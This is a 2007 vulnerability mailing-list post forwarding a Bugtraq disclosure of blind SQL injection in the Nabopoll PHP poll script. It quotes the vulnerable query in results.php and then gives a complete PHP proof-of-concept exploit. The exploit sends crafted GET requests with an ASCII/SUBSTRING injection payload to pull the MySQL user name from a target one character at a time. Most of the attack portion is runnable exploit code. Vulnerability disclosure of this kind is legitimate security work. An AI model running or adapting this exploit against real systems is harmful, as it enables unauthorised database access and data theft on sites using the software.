[VIM] [TRUE] Nabopoll Blind SQL Injection vulnerabilies (Confirmed)
Noam Rathaus
noamr at beyondsecurity.com
Thu Feb 22 06:23:19 EST 2007
Hi,
I see that str0ke already confirmed it.
---------- Forwarded Message ----------
Subject: Nabopoll Blind SQL Injection vulnerabilies
Date: Wednesday 21 February 2007 17:40
From: s0cratex at hotmail.com
To: bugtraq at securityfocus.com
Nabopoll have a bug in some files, for example results.php
Line 27...31
--------------------------------
$res_question = mysql_query("select * from nabopoll_questions where
survey=$survey order by id");
if ($res_question == FALSE || mysql_numrows($res_question) == 0)
error($row_survey, "questions not found");
--------------------------------
Exploit
--------------------------------
<?
# Nabopoll Blind SQL Injection P0C Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex at hotmail.com
error_reporting(0);
ini_set("max_execution_time",0);
// just change the default values...
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; //you can verify the number entering in the site and viewing
the results...
echo "==================================================\n";
echo "Nabopoll SQL Injection -- Proof of Concept Exploit\n";
echo "--------------------------------------------------\n\n";
echo " -- MySQL User: ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl =
"/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(us
er(),".$j.",1))=".$x."),1,0)))/*"; $cnx = fsockopen($srv,$port);
fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n");
while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo
chr($x); break; } } fclose($cnx);
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
?>
-------------------------------------------------------
--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
More information about the VIM
mailing list